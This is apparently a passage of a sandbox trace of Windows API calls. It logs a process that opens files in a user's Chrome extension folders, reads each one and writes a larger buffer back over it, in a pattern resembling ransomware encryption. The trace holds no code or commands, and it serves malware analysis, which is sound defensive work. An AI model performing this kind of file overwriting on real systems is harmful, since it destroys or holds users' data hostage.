WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x65d, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x65d, lpOverlapped=0x0) returned 1 [0177.506] CloseHandle (hObject=0x1cc) returned 1 [0177.507] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.507] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.507] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xd6 [0177.507] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.507] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.508] ReleaseMutex (hMutex=0x168) returned 1 [0177.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.508] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xd6, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2e9f2bc*=0xd6, lpOverlapped=0x0) returned 1 [0177.509] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.509] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x65e, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x65e, lpOverlapped=0x0) returned 1 [0177.509] CloseHandle (hObject=0x1cc) returned 1 [0177.509] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.510] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.510] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2b56 [0177.510] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.510] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.510] ReleaseMutex (hMutex=0x168) returned 1 [0177.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0177.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x1f8867c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verified_contents.json", lpUsedDefaultChar=0x0) returned 22 [0177.510] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.513] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1b56 [0177.513] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.513] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1b56 [0177.513] WriteFile (in: hFile=0x1cc, lpBuffer=0x2885c48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2885c48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.514] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0177.514] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0177.514] CloseHandle (hObject=0x1cc) returned 1 [0177.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.515] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.515] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x100 [0177.515] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.515] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.515] ReleaseMutex (hMutex=0x168) returned 1 [0177.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.516] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eea868, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x2e9f2bc*=0x100, lpOverlapped=0x0) returned 1 [0177.517] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.517] WriteFile (in: hFile=0x1cc, lpBuffer=0x2883c38*, nNumberOfBytesToWrite=0x688, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2883c38*, lpNumberOfBytesWritten=0x2e9f2d0*=0x688, lpOverlapped=0x0) returned 1 [0177.517] CloseHandle (hObject=0x1cc) returned 1 [0177.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.518] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.518] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x101 [0177.518] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.518] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.518] ReleaseMutex (hMutex=0x168) returned 1 [0177.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.519] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eea868, nNumberOfBytesToRead=0x101, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x2e9f2bc*=0x101, lpOverlapped=0x0) returned 1 [0177.520] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.520] WriteFile (in: hFile=0x1cc, lpBuffer=0x2883c38*, nNumberOfBytesToWrite=0x689, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2883c38*, lpNumberOfBytesWritten=0x2e9f2d0*=0x689, lpOverlapped=0x0) returned 1 [0177.520] CloseHandle (hObject=0x1cc) returned 1 [0177.520] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.521] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.521] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x102 [0177.521] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.521] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.521] ReleaseMutex (hMutex=0x168) returned 1 [0177.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.521] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eea868, nNumberOfBytesToRead=0x102, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x2e9f2bc*=0x102, lpOverlapped=0x0) returned 1 [0177.523] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.523] WriteFile (in: hFile=0x1cc, lpBuffer=0x2883c38*, nNumberOfBytesToWrite=0x68a, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2883c38*, lpNumberOfBytesWritten=0x2e9f2d0*=0x68a, lpOverlapped=0x0) returned 1 [0177.523] CloseHandle (hObject=0x1cc) returned 1 [0177.523] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.524] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.524] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x101 [0177.524] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.524] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.524] ReleaseMutex (hMutex=0x168) returned 1 [0177.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.524] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eea868, nNumberOfBytesToRead=0x101, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x2e9f2bc*=0x101, lpOverlapped=0x0) returned 1 [0177.526] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.526] WriteFile (in: hFile=0x1cc, lpBuffer=0x2883c38*, nNumberOfBytesToWrite=0x689, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2883c38*, lpNumberOfBytesWritten=0x2e9f2d0*=0x689, lpOverlapped=0x0) returned 1 [0177.526] CloseHandle (hObject=0x1cc) returned 1 [0177.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.527] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.527] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xfd [0177.528] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.528] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.528] ReleaseMutex (hMutex=0x168) returned 1 [0177.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.528] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eea868, nNumberOfBytesToRead=0xfd, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x2e9f2bc*=0xfd, lpOverlapped=0x0) returned 1 [0177.529] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.529] WriteFile (in: hFile=0x1cc, lpBuffer=0x2883c38*, nNumberOfBytesToWrite=0x685, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2883c38*, lpNumberOfBytesWritten=0x2e9f2d0*=0x685, lpOverlapped=0x0) returned 1 [0177.529] CloseHandle (hObject=0x1cc) returned 1 [0177.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.530] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.530] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xd4e [0177.530] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.530] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.530] ReleaseMutex (hMutex=0x168) returned 1 [0177.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="128.png", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0177.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="128.png", cchWideChar=7, lpMultiByteStr=0x1f7ad5c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="128.png", lpUsedDefaultChar=0x0) returned 7 [0177.531] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0xd4e, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f2bc*=0xd4e, lpOverlapped=0x0) returned 1 [0177.543] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.543] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x12d6, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x12d6, lpOverlapped=0x0) returned 1 [0177.543] CloseHandle (hObject=0x1cc) returned 1 [0177.543] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.544] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.544] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb3 [0177.544] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.544] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.544] ReleaseMutex (hMutex=0x168) returned 1 [0177.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.545] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f39618, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f39618*, lpNumberOfBytesRead=0x2e9f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0177.548] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.548] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0177.548] CloseHandle (hObject=0x1cc) returned 1 [0177.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.549] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.549] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb3 [0177.549] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.549] 